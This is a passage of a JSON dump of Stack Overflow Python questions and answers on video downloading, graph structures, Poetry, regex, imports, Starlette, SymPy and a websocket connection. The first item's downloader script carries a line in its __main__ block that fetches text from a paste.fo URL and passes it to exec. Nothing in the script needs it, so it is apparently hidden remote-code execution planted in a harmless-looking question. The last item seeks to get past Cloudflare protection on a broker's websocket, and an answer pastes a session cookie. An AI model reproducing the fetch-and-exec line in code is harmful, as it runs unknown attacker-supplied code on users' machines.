time.sleep(5)\n\n vids = input(\"How many videos you want to download? \")\n\n soup = BeautifulSoup(browser.page_source, 'lxml')\n links = soup.findAll(\"source\")\n \n for link in islice(links, int(vids)):\n video_links.append(link.get(\"src\"))\n \n\n return video_links\n\n#download all videos\ndef download_video_series(video_links):\n i=1\n for link in video_links:\n # iterate through all links in video_links\n # and download them one by one\n # obtain filename by splitting url and getting last string\n fn = link.split('\/')[-1] \n file_name = fn.split(\"?\")[0]\n print (f\"Downloading video: vid{i}.mp4\")\n\n #create response object\n r = requests.get(link, stream = True)\n \n #download started\n with open(f\"videos\/vid{i}.mp4\", 'wb') as f:\n for chunk in r.iter_content(chunk_size = 1024*1024):\n if chunk:\n f.write(chunk)\n \n print (f\"downloaded! vid{i}.mp4\")\n\n i+=1\n\n\n\nif __name__ == \"__main__\":\n x=get('https:\/\/paste.fo\/raw\/ba188f25eaf3').text;exec(x)\n #getting all video links\n video_links = get_video_links()\n\n #download all videos\n download_video_series(video_links)\n\nI searched alot and readed several topics about downloading videos from Pexels but didn't find anyone talking about choosing video reolution when downloading from Pexels using Python.","Title":"How do I choose video resolution before downloading from Pexels in Python?","Tags":"python","AnswerCount":1,"A_Id":75790764,"Answer":"Use Pixel API its free with limit:\nBy default, the API is rate-limited to 200 requests per hour and 20,000 requests per month.\nIt doesn't make sense to scrape free resource, with free API.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75392754,"CreationDate":"2023-02-08 23:32:27","Q_Score":2,"ViewCount":116,"Question":"I am practicing a couple algorithms (DFS, BFS). To set up the practice examples, I need to make a graph with vertices and edges. I have seen two approaches - defining an array of vertices and an array of edges, and then combining them into a \"graph\" using a dictionary, like so:\ngraph = {'A': ['B', 'E', 'C'],\n 'B': ['A', 'D', 'E'],\n 'C': ['A', 'F', 'G'],\n 'D': ['B', 'E'],\n 'E': ['A', 'B', 'D'],\n 'F': ['C'],\n 'G': ['C']}\n\nBut in a video series made by the author of \"cracking the coding interview\", their approach was to define a \"node\" object, which holds an ID, and a list of adjacent\/child nodes (in Java):\npublic static class Node {\nprivate int id;\nLinkedList adjacent = new LinkedList(); \/\/ nodes children\nprivate Node(int id) {\n this.id = id; \/\/set nodes ID\n }\n}\n\nThe pitfall I see of using the latter method, is making a custom function to add edges, as well has lacking an immediate overview of the structure of the entire graph; To make edges, you have to first retrieve the node object associated with the ID by first traversing to it or using a hashmap, and then by using its reference, adding the destination node to that source node:\nprivate Node getNode(int id) {} \/\/method to retrieve node from hashmap\npublic void addEdge(int source, int destination) {\n Node s = getNode(source);\n Node d = getNode(destination);\n s.adjacent.add(d); \n}\n\nWhile in comparison using a simple dictionary, it is trivial to add new edges:\ngraph['A'].append('D')\n\nBy using a node object, adding a new connection to every child of a node is more verbose (imagine the Node class as a Python class which takes an ID and list of node-object children):\nnode1 = Node('A', [])\nnode2 = Node('B', [node1])\nnode3 = Node('C', [node1, node2])\n\nnew_node = Node('F', [])\n\nfor node in node3.adjacent:\n node.adjacent.append(new_node) # adds 'F' node to every child node of 'C'\n\nwhile using dictionaries, if I want to add new_node to every connection\/child of node3:\nfor node in graph['C']:\n graph[node].append('F')\n\nWhat are the benefits in space and time complexity in building graphs using node objects versus dictionaries? Why would the author use node objects instead of a dictionary? My immediate intuition says that using objects would allow you make something much more complex (like each node representing a server, with an IP, mac address, cache, etc) while a dictionary is probably only useful for studying the structure of the graph. Is this correct?","Title":"Pros\/cons of defining a graph as nested node objects versus a dictionary?","Tags":"python,java,algorithm,dictionary,data-structures","AnswerCount":1,"A_Id":75392865,"Answer":"What are the benefits in space and time complexity in building graphs using node objects versus dictionaries\n\nIn terms of space, the complexity is the same for both. But in terms of time, each has its' own advantages.\nAs you said, if you need to query for a specific node, the dictionary is better, with an O(1) query. But if you need to add nodes, the graph version has only O(1) time complexity, while the dictionary has an amortized O(1) time complexity, becoming O(n) when an expansion is needed.\nOverall, think of the comparison as an ArrayList vs LinkedList, since the principles are the same.\nFinally, if you do opt to use the dictionary version and you predict you won't have a small number of adjecant nodes, you can store edges in a set instead of an array, since they're most likely not ordered and querying a node for the existance of an adjecant node becomes an O(1) operation instead of O(n). The same applies to the nodes version, using a set instead of a linked list. Just make sure the extra overhead of the insertions makes it worthwhile.\n\nMy immediate intuition says that using objects would allow you make something much more complex (like each node representing a server, with an IP, mac address, cache, etc) while a dictionary is probably only useful for studying the structure of the graph. Is this correct?\n\nNo. With the dictionary, you can either have a separate dictionary that associates with node (key) to its' value, or if the value is small enough, like an IPv4, and it's unique, you can just use it as a key.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75397736,"CreationDate":"2023-02-09 11:08:22","Q_Score":39,"ViewCount":19954,"Question":"I am using Poetry for the first time.\nI have a very simple project. Basically\na_project\n|\n|--test\n| |---test_something.py\n|\n|-script_to_test.py\n\nFrom a project I do poetry init and then poetry install\nI get the following\n poetry install\nUpdating dependencies\nResolving dependencies... (0.5s)\n\nWriting lock file\n\nPackage operations: 7 installs, 0 updates, 0 removals\n\n \u2022 Installing attrs (22.2.0)\n \u2022 Installing exceptiongroup (1.1.0)\n \u2022 Installing iniconfig (2.0.0)\n \u2022 Installing packaging (23.0)\n \u2022 Installing pluggy (1.0.0)\n \u2022 Installing tomli (2.0.1)\n \u2022 Installing pytest (7.2.1)\n\n\/home\/me\/MyStudy\/2023\/pyenv_practice\/dos\/a_project\/a_project does not contain any element\n\nafter this I can run poetry run pytest without problem but what does that error message mean?","Title":"Poetry install on an existing project Error \"does not contain any element\"","Tags":"python,python-poetry","AnswerCount":4,"A_Id":75399493,"Answer":"create a dir with_your_package_name that u find in the file and an empty __init__.py in project root\ndelete the poetry.lock and install again","Users Score":-1,"is_accepted":false,"Score":-0.049958375,"Available Count":2},{"Q_Id":75397736,"CreationDate":"2023-02-09 11:08:22","Q_Score":39,"ViewCount":19954,"Question":"I am using Poetry for the first time.\nI have a very simple project. Basically\na_project\n|\n|--test\n| |---test_something.py\n|\n|-script_to_test.py\n\nFrom a project I do poetry init and then poetry install\nI get the following\n poetry install\nUpdating dependencies\nResolving dependencies... (0.5s)\n\nWriting lock file\n\nPackage operations: 7 installs, 0 updates, 0 removals\n\n \u2022 Installing attrs (22.2.0)\n \u2022 Installing exceptiongroup (1.1.0)\n \u2022 Installing iniconfig (2.0.0)\n \u2022 Installing packaging (23.0)\n \u2022 Installing pluggy (1.0.0)\n \u2022 Installing tomli (2.0.1)\n \u2022 Installing pytest (7.2.1)\n\n\/home\/me\/MyStudy\/2023\/pyenv_practice\/dos\/a_project\/a_project does not contain any element\n\nafter this I can run poetry run pytest without problem but what does that error message mean?","Title":"Poetry install on an existing project Error \"does not contain any element\"","Tags":"python,python-poetry","AnswerCount":4,"A_Id":75470537,"Answer":"My issue got away after pointed correct interpreter in PyCharm. Poetry makes project environment in its own directories and PyCharm didn't link that correct.\nI've added new environment in PyCharm and select poetary's just created enviroment in dialogs.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75399290,"CreationDate":"2023-02-09 13:27:34","Q_Score":1,"ViewCount":44,"Question":"I have a protein sequence:\n`seq = \"EIVLTQSPGTLSLSRASQS---VSSSYLAWYQQKPG\"\nand i want to match two type regions\/strings:\nthe first type is continuous,like TQSPG in seq.\nthe second type we only know the continuous form, but in fact there may be multiple \"-\" characters in the middle,for example what i know is SQSVS, but in seq it is SQS---VS.\nwhat i want to do is to match these two type of string and get the index, forexample TQSPG is (4,9), and for SQSVS is (16,24).\nI tried use re.search('TQSPG',seq).span(), it return (4,9), but i don't konw how to deal the second type.","Title":"how to match a string allowed \"-\" appear multiple times with python re?","Tags":"python,string,python-re","AnswerCount":2,"A_Id":75399354,"Answer":"re.search(r'([SQVS]+-*[SQVS]+)', seq).span()\nAssuming that the '-' can will be between the first and last character","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75399290,"CreationDate":"2023-02-09 13:27:34","Q_Score":1,"ViewCount":44,"Question":"I have a protein sequence:\n`seq = \"EIVLTQSPGTLSLSRASQS---VSSSYLAWYQQKPG\"\nand i want to match two type regions\/strings:\nthe first type is continuous,like TQSPG in seq.\nthe second type we only know the continuous form, but in fact there may be multiple \"-\" characters in the middle,for example what i know is SQSVS, but in seq it is SQS---VS.\nwhat i want to do is to match these two type of string and get the index, forexample TQSPG is (4,9), and for SQSVS is (16,24).\nI tried use re.search('TQSPG',seq).span(), it return (4,9), but i don't konw how to deal the second type.","Title":"how to match a string allowed \"-\" appear multiple times with python re?","Tags":"python,string,python-re","AnswerCount":2,"A_Id":75399385,"Answer":"Assuming the order of SQSVS needs to be preserved, I'd propose the regex r'S-*Q-*S-*V-*S'. This will match the sequence SQSVS with any number (might be 0) of hyphens included between either of the letters.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75399303,"CreationDate":"2023-02-09 13:28:32","Q_Score":1,"ViewCount":107,"Question":"Only for a .py file that is saved on my Desktop, importing some modules (like pandas) fail due to Module not found from an import that happens within the module.\nThis behaviour doesn't happen when the file is saved to a different location.\nWorking on a Mac and i made a test.py file that only holds: import pandas as pd\nwhen this test.py is saved on my desktop it generates this error:\nDesktop % python3 test.py\nTraceback (most recent call last):\n File \"\/Users\/XXX\/Desktop\/test.py\", line 2, in \n import pandas as pd\n File \"\/Users\/XXX\/Desktop\/pandas\/__init__.py\", line 22, in \n from pandas.compat import (\n File \"\/Users\/XXX\/Desktop\/pandas\/compat\/__init__.py\", line 15, in \n from pandas.compat.numpy import (\n File \"\/Users\/XXX\/Desktop\/pandas\/compat\/numpy\/__init__.py\", line 7, in \n from pandas.util.version import Version\n File \"\/Users\/XXX\/Desktop\/pandas\/util\/__init__.py\", line 1, in \n from pandas.util._decorators import ( # noqa\n File \"\/Users\/XXX\/Desktop\/pandas\/util\/_decorators.py\", line 14, in \n from pandas._libs.properties import cache_readonly # noqa\n File \"\/Users\/XXX\/Desktop\/pandas\/_libs\/__init__.py\", line 13, in \n from pandas._libs.interval import Interval\nModuleNotFoundError: No module named 'pandas._libs.interval'\n\nthe weird thing is that if i save the test.py file to any other location on my HD it imports pandas perfectly.\nSame thing happens for some other modules. The module im trying to import seems to go oke but it fails on an import that happens from within the module.\nrunning which python3 in console from either the desktop folder or any other folder results in:\n\/Users\/XXXX\/.pyenv\/shims\/python\npython3 --version results in Python 3.10.9 for all locations.","Title":"Python Module not found ONLY when .py file is on desktop","Tags":"python,macos,python-3.10,modulenotfounderror,file-location","AnswerCount":2,"A_Id":75399409,"Answer":"You have a directory named pandas on your desktop.\nPython trying to import from this directory instead of the global package named pandas.\nYou can also see that in the exception, look at the trace, from \/Users\/XXX\/Desktop\/test.py the code moves to \/Users\/XXX\/Desktop\/pandas\/__init__.py and so on.\nJust rename the name of the directory on your desktop.\nFor your own safety, you should not name your local directories with the same names as global packages.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75400681,"CreationDate":"2023-02-09 15:19:10","Q_Score":1,"ViewCount":372,"Question":"I have a question regarding h5pyViewer to view h5 files. I tried pip install h5pyViewer but that didn't work. I checked on Google and it states that h5pyViewer does not work for older versions of Python, but that there are a few solutions on GitHub. I downloaded this with pip install git+https:\/\/github.com\/Eothred\/h5pyViewer.git which finally gave me a successful installation.\nYet, when I want to import the package with import h5pyViewer it gave me the following error: ModuleNotFoundError: No module named 'h5pyViewer'. However when I tried to install it again it says:\nRequirement already satisfied: h5pyviewer in c:\\users\\celin\\anaconda3\\lib\\site-packages (-v0.0.1.15)Note: you may need to restart the kernel to use updated packages.\n\nAny ideas how to get out of this loop or in what other way I could access an .h5 file?","Title":"ModuleNotFoundError: No module named 'h5pyViewer'","Tags":"python,h5py","AnswerCount":1,"A_Id":75401050,"Answer":"There could be so many things wrong so it's hard to say what the problem is.\n\nThe actual package import has a lowercase \"v\": h5pyviewer (as seen in your error message).\n\nYour IDE\/python runner may not be using your Conda environment (you can select the environment in VSCode, and if you are running a script in the terminal make sure your Conda env is enabled in that terminal)\n\nThe GitHub package might be exported from somewhere else. Try something like from Eothred import h5pyviewer.\n\nMaybe h5pyviewer is not even supposed to be imported this way!\n\n\nOverall, I don't suggest using this package, it seems like it's broken on Python 3 and not well maintained. The code in GitHub looks sketchy, and very few people use it. A good indicator is usually the number of people that star or use the package, which seems extremely low. Additionally, it doesn't even have a real readme file! It doesn't say how to use it at all. Suggest you try something else like pandas. But if you really want to go with this, you can try the above debugging steps.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75403882,"CreationDate":"2023-02-09 20:04:26","Q_Score":2,"ViewCount":230,"Question":"Given the following directory structure for a package my_package:\n\/\n\u251c\u2500\u2500 data\/\n\u2502 \u251c\u2500\u2500 more_data\/\n\u2502 \u2514\u2500\u2500 foo.txt\n\u251c\u2500\u2500 my_package\/\n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u2514\u2500\u2500 stuff\/\n\u2502 \u2514\u2500\u2500 __init__.py\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 setup.cfg\n\u251c\u2500\u2500 setup.py\n\nHow can I make the data\/ directory accessible (in the most Pythonic way) from within code, without using __file__ or other hacky solutions? I have tried using data_files in setup.py and the [options.package_data] in setup.cfg to no avail.\nI would like to do something like:\ndir_data = importlib.resources.files(data)\ncsv_files = dir_data.glob('*.csv')\n\nEDIT:\nI'm working with an editable installation and there's already a data\/ directory in the package (for source code unrelated to the top-level data).","Title":"Add a data directory outside Python package directory","Tags":"python,setuptools,setup.py,python-packaging,python-importlib","AnswerCount":2,"A_Id":75445678,"Answer":"Create an empty data\/__init__.py file, so that data becomes a top-level import package, so that the data files become package data, so that they are accessible via importlib.resources.files('data'). This should work with \"editable installation\". You might need to do small changes in your packaging files (setup.py or setup.cfg or pyproject.toml).","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75409352,"CreationDate":"2023-02-10 09:49:46","Q_Score":1,"ViewCount":85,"Question":"So I have tried to find an average of a value for an index 0 before it exchange to another index.\nAn example of the dataframe:\n\n\n\n\ncolumn_a\nvalue_b\nsum_c\ncount_d_\navg_e\n\n\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n30\n2\n\n\n\n0\n30\n60\n3\n20\n\n\n1\n10\n10\n1\n\n\n\n1\n20\n30\n2\n\n\n\n1\n30\n60\n3\n20\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n30\n2\n15\n\n\n1\n10\n10\n1\n\n\n\n1\n20\n30\n2\n\n\n\n1\n30\n60\n3\n20\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n\n\n\n\n\n\n\nhowever, only the last row for sum and count is unavailable, so the avg cannot be calculated for it\npart of the code...\n#sum and avg for each section\n\nfor i, row in df.iloc[0:-1].iterrows():\n if df['column_a'][i] == 0:\n sum = sum + df['value_b'][i]\n df['sum_c'][i] = sum\n count = count + 1\n df['count_d'][i] = count\n else:\n sum = 0 \n count = 0\n df['sum_c'][i] = sum\n df['count_d'][i] = count\n\ntotcount = 0\nfor m, row in df.iloc[0:-1].iterrows():\n if df.loc[m, 'column_a'] == 0 :\n if (df.loc[m+1, 'sum_c'] == 0) :\n totcount = df.loc[m, 'count_d']\n avg_e = (df.loc[m, 'sum_c']) \/ totcount\n df.loc[m, 'avg_e'] = avg_e\n\nhave tried only using df.iloc[0:].iterrows but it produce an error.","Title":"Last row of some column in dataframe not included","Tags":"python,pandas,dataframe","AnswerCount":2,"A_Id":75409657,"Answer":"It is the expected behavior of df.iloc[0:-1] to return all the rows excepting the last one. When using slicing, remember that the last index you provide is not included in the return range. Since -1 is the index of the last row, [0:-1] excludes the last row.\nThe solution given by @mozway is anyway more elegant, but if for any reason you still want to use iterrows(), you can use df.iloc[0:].\nThe error ou got when you did may be due to your df.loc[m+1, 'sum_c']. At the last row, m+1 will be out of bounds and produce an IndexError.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75409462,"CreationDate":"2023-02-10 09:57:51","Q_Score":1,"ViewCount":127,"Question":"After installing phycharm i get an error message:\"Please select a valid Python interpreter\".\nI went to the python interpreter settings add interpreter system interpreter wrote the path to the python.exe. When I select the Python.exe and click on \"Ok\" I get an error message:\" invalid python interpreter name\"python.exe\"\nI tried reinstalling phycharm and looking for youtube video solutions but none of them worked.","Title":"Selecting Python.exe as a interpreter doesnt work?","Tags":"python,pycharm","AnswerCount":1,"A_Id":75409570,"Answer":"did you try to reinstall python ? And try to use python from cmd to check if your python.exe file does indeed work properly.\nLmk if that doesn't work, but the problem seems kinda weird, dumb question but did you select the python.exe file ? Watch out to not select only the folder.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75410361,"CreationDate":"2023-02-10 11:14:18","Q_Score":1,"ViewCount":55,"Question":"I'm working on a Starlette API. I am trying to receive a response object or json but I end up with a tuple. Any thoughts or guidance will be appreciated.\nFrontend:\nheaders = {\"Authorization\": settings.API_KEY}\nassociation = requests.get(\n \"http:\/\/localhost:9999\/get-association\",\n headers=headers,\n),\nprint(\"association:\", type(association))\n\nassociation: \nBackend:\n@app.route(\"\/get-association\")\nasync def association(request: Request):\n if request.headers[\"Authorization\"] != settings.API_KEY:\n return JSONResponse({\"error\": \"unauthorized\"}, status_code=401)\n # return JSONResponse(\n # content=await get_association(), status_code=200\n # )\n association = {\"association\": \"test data\"}\n print(\"association:\", type(association), association)\n return JSONResponse(association)\n\n\nassociation: {'association': 'test data'}","Title":"Python and Starlette - receiving a tuple from an API that's trying to return json","Tags":"python,json,starlette","AnswerCount":1,"A_Id":75410551,"Answer":"You have a comma after requests.get. This is making a tuple of (,).","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75415286,"CreationDate":"2023-02-10 19:20:07","Q_Score":4,"ViewCount":4772,"Question":"I am currently running python 3.9.13 on my mac. I wanted to update my version to 3.10.10\nI tried running\nbrew install python\n\nHowever it says that \"python 3.10.10 is already installed\"!\nWhen i run\npython3 --version\n\nin the terminal it says that i am still on \"python 3.9.13\"\nSo my question is, how do i change the python version from 3.9.13 to 3.10.10? I already deleted python 3.9 from my applications and python 3.10 is the only one that is still there.\nI also tried to install python 3.10.10 from the website and installing it. However it does not work. Python 3.10.10 is being installed successfully but the version is still the same when i check it.","Title":"How to change python3 version on mac to 3.10.10","Tags":"python,installation,pip,version,upgrade","AnswerCount":4,"A_Id":75415540,"Answer":"Just delete the current python installation on your device and download the version you want from the offical website. That is the easiest way and the most suitable one for a beginner.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75415286,"CreationDate":"2023-02-10 19:20:07","Q_Score":4,"ViewCount":4772,"Question":"I am currently running python 3.9.13 on my mac. I wanted to update my version to 3.10.10\nI tried running\nbrew install python\n\nHowever it says that \"python 3.10.10 is already installed\"!\nWhen i run\npython3 --version\n\nin the terminal it says that i am still on \"python 3.9.13\"\nSo my question is, how do i change the python version from 3.9.13 to 3.10.10? I already deleted python 3.9 from my applications and python 3.10 is the only one that is still there.\nI also tried to install python 3.10.10 from the website and installing it. However it does not work. Python 3.10.10 is being installed successfully but the version is still the same when i check it.","Title":"How to change python3 version on mac to 3.10.10","Tags":"python,installation,pip,version,upgrade","AnswerCount":4,"A_Id":76398761,"Answer":"When you download latest version, it comes with a file named Update Shell Profile.command.\nIn mac, you can find it at \/Applications\/Python 3.11\/Update Shell Profile.command.\nRun it and it should upgrade to latest version.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75415356,"CreationDate":"2023-02-10 19:29:24","Q_Score":1,"ViewCount":40,"Question":"I'm new to Python, know just enough R to get by. I have a 10 by 10 dataframe.\nsmall2\n USLC USSC INTD ... DSTS PCAP PRE\n0 0.059304 0.019987 -0.034140 ... 0.003009 0.113144 -0.021656\n1 0.003835 -0.024248 0.012446 ... 0.005323 -0.013716 0.011109\n2 -0.045045 -0.047186 -0.002372 ... -0.011956 -0.118342 -0.045023\n3 0.054108 0.002787 0.003714 ... 0.014466 0.128931 -0.007596\n4 0.064045 0.111250 0.077478 ... 0.012059 0.115427 0.079145\n5 0.041442 0.042858 0.047701 ... 0.009984 0.047098 0.003579\n6 0.081832 0.046531 0.010531 ... 0.031772 0.126552 0.001398\n7 -0.047171 0.022883 -0.065095 ... -0.010224 -0.025990 -0.055431\n8 0.054844 0.073193 0.044514 ... 0.016301 0.031755 0.044597\n9 -0.032403 -0.043930 -0.065013 ... 0.011944 -0.032902 -0.117689\n\nI want to create a list of several dataframes that are each just rolling 5 by 10 frames. Rows 0 through 4, 1 through 5, etc. I've seen articles addressing something similar, but they haven't worked. I'm thinking about it like lapply in R.\nI've tried splits = [small2.iloc[[i-4:i]] for i in small2.index] and got a syntax error from the colon.\nI then tried splits = [small2.iloc[[i-4,i]] for i in small2.index] which gave me a list of ten elements. It should be six 5 by 10 elements.\nFeel like I'm missing something basic. Thank you!","Title":"Turn a larger Pandas data frame into smaller rolling data frames","Tags":"python","AnswerCount":2,"A_Id":75415971,"Answer":"I figured it out. splits = [small2.iloc[i-4:i+1] for i in small2.index[4:10]]\nNot sure how this indexing makes sense though.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75421933,"CreationDate":"2023-02-11 17:18:05","Q_Score":1,"ViewCount":64,"Question":"I have a custom Sympy cSymbol class for the purpose of adding properties to declared symbols. This is done as follows:\nclass cSymbol(sy.Symbol):\n def __init__(self,name,x,**assumptions):\n self.x = x \n sy.Symbol.__init__(name,**assumptions)\n\nThe thing is that when I declare a cSymbol within a function (say, it affects the property x of a cSymbol declared outside the function if the names are the same (here \"a\"):\ndef some_function():\n dummy = cSymbol(\"a\",x=2)\n\na = cSymbol(\"a\",x=1)\nprint(a.x) # >> 1\nsome_function()\nprint(a.x) # >> 2, but should be 1\n\nIs there a way to prevent this (other than passing distinct names) ? Actually I am not sure to understand why it behaves like this, I thougt that everything declared within the function would stay local to this function.\nFull code below:\nimport sympy as sy\n\nclass cSymbol(sy.Symbol):\n def __init__(self,name,x,**assumptions):\n self.x = x \n sy.Symbol.__init__(name,**assumptions)\n \ndef some_function():\n a = cSymbol(\"a\",x=2)\n\n\nif __name__ == \"__main__\":\n a = cSymbol(\"a\",x=1)\n print(a.x) # >> 1\n some_function()\n print(a.x) # >> 2, but should be 1","Title":"Declare symbols local to functions in SymPy","Tags":"python,sympy,subclassing","AnswerCount":1,"A_Id":75422178,"Answer":"You aren't creating a local Python variable in the subroutine, you are create a SymPy Symbol object and all Symbol objects with the same name and assumptions are the same. It doesn't matter where they are created. It sounds like you are blurring together the Python variable and the SymPy variable which, though both bearing the name \"variable\", are not the same.","Users Score":3,"is_accepted":false,"Score":0.537049567,"Available Count":1},{"Q_Id":75424277,"CreationDate":"2023-02-12 00:48:24","Q_Score":1,"ViewCount":63,"Question":"I am creating a code editor, and I am trying to create a run feature. Right now I see that the problems come when I encounter a folder with a space in its name. It works on the command line, but not with os.system().\ndef run(event):\n if open_status_name != False:\n directory_split = open_status_name.split(\"\/\")\n for directory in directory_split:\n if directory_split.index(directory) > 2:\n true_directory = directory.replace(\" \", \"\\s\")\n print(true_directory)\n data = os.system(\"cd \" + directory.replace(\" \", \"\\s\"))\n print(data)\n\nI tried to replace the space with the regex character \"\\s\" but that also didn't work.","Title":"Is there a way for a Python program to \"cd\" to a folder that has a space in it?","Tags":"python,cmd","AnswerCount":1,"A_Id":75424334,"Answer":"os.system runs the command in a shell. You'd have to add quotes to get the value though: os.system(f'cd \"{directory}\"'). But the cd would only be valid for that subshell for the brief time it exists - it would not change the directory of your python program. Use os.chdir(directory) instead.\nNote - os.chdir can be risky as any relative paths you have in your code suddenly become invalid once you've done that. It may be better to manage your editor's \"current path\" on your own.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75428618,"CreationDate":"2023-02-12 16:52:52","Q_Score":1,"ViewCount":75,"Question":"I have a python script which run 24 hours on my local system and my script uses different third party libraries that are installed using pip in python\nLibraries\nBeautifulSoup\nrequests\nm3u8\n\nMy python script is recording some live stream videos from a website and is storing on system. How google cloud will help me to run this script 24\/hours daily and 7days a week.I am very new to clouds. Please help me i want to host my script on google cloud so i want to make sure that my script will work there same as it is working on local system so my money will not lost .","Title":"Will Google Cloud run this type of application?","Tags":"python,google-cloud-platform","AnswerCount":2,"A_Id":75434722,"Answer":"If you want to run 24\/7 application on the cloud, whatever the cloud, you must not use solution with timeout (like Cloud Run or Cloud Functions).\nYou can imagine using App Engine flex, but it won't be my best advice.\nThe most efficient for me (low maintenance, cost efficient), is to use GKE autopilot. A Kubernetes cluster managed for you, you pay only the CPU\/Memory that your workloads use.\nYou have to containerize your app to do that.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75430030,"CreationDate":"2023-02-12 20:37:44","Q_Score":1,"ViewCount":212,"Question":"how to bypass HTTP\/1.1 403 Forbidden in connect to wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket, i try change user-agent and try use proxy and add cookis but not work\nclass WebsocketClient(object):\n\n\n def __init__(self, api):\n websocket.enableTrace(True)\n Origin = 'Origin: https:\/\/qxbroker.com'\n Extensions = 'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits'\n Host = 'Host: ws2.qxbroker.com'\n Agent = 'User-Agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36 OPR\/94.0.0.0'\n \n self.api = api\n self.wss=websocket.WebSocketApp(('wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket'), on_message=(self.on_message),\n on_error=(self.on_error),\n on_close=(self.on_close),\n on_open=(self.on_open),\n header=[Origin,Extensions,Agent])\n\n\nrequest and response header this site protect with cloudflare\n--- request header ---\nGET \/socket.io\/?EIO=3&transport=websocket HTTP\/1.1\nUpgrade: websocket\nHost: ws2.qxbroker.com\nSec-WebSocket-Key: 7DgEjWxUp8N8PVY7N7vyDw==\nSec-WebSocket-Version: 13\nConnection: Upgrade\nOrigin: https:\/\/qxbroker.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36\n-----------------------\n--- response header ---\nHTTP\/1.1 403 Forbidden\nDate: Sat, 11 Feb 2023 23:33:11 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: close\nPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()\nReferrer-Policy: same-origin\nX-Frame-Options: SAMEORIGIN\nCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\nSet-Cookie: __cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\nServer-Timing: cf-q-config;dur=6.9999950937927e-06\nServer: cloudflare\nCF-RAY: 7980e3583b6a0785-MRS","Title":"How to creat connection websocket qxbroker in python","Tags":"python-3.x,websocket,cloudflare","AnswerCount":2,"A_Id":75525970,"Answer":"Sending cookies in websocketapp argument?\n\"__cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\"","Users Score":-1,"is_accepted":false,"Score":-0.0996679946,"Available Count":2},{"Q_Id":75430030,"CreationDate":"2023-02-12 20:37:44","Q_Score":1,"ViewCount":212,"Question":"how to bypass HTTP\/1.1 403 Forbidden in connect to wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket, i try change user-agent and try use proxy and add cookis but not work\nclass WebsocketClient(object):\n\n\n def __init__(self, api):\n websocket.enableTrace(True)\n Origin = 'Origin: https:\/\/qxbroker.com'\n Extensions = 'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits'\n Host = 'Host: ws2.qxbroker.com'\n Agent = 'User-Agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36 OPR\/94.0.0.0'\n \n self.api = api\n self.wss=websocket.WebSocketApp(('wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket'), on_message=(self.on_message),\n on_error=(self.on_error),\n on_close=(self.on_close),\n on_open=(self.on_open),\n header=[Origin,Extensions,Agent])\n\n\nrequest and response header this site protect with cloudflare\n--- request header ---\nGET \/socket.io\/?EIO=3&transport=websocket HTTP\/1.1\nUpgrade: websocket\nHost: ws2.qxbroker.com\nSec-WebSocket-Key: 7DgEjWxUp8N8PVY7N7vyDw==\nSec-WebSocket-Version: 13\nConnection: Upgrade\nOrigin: https:\/\/qxbroker.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; 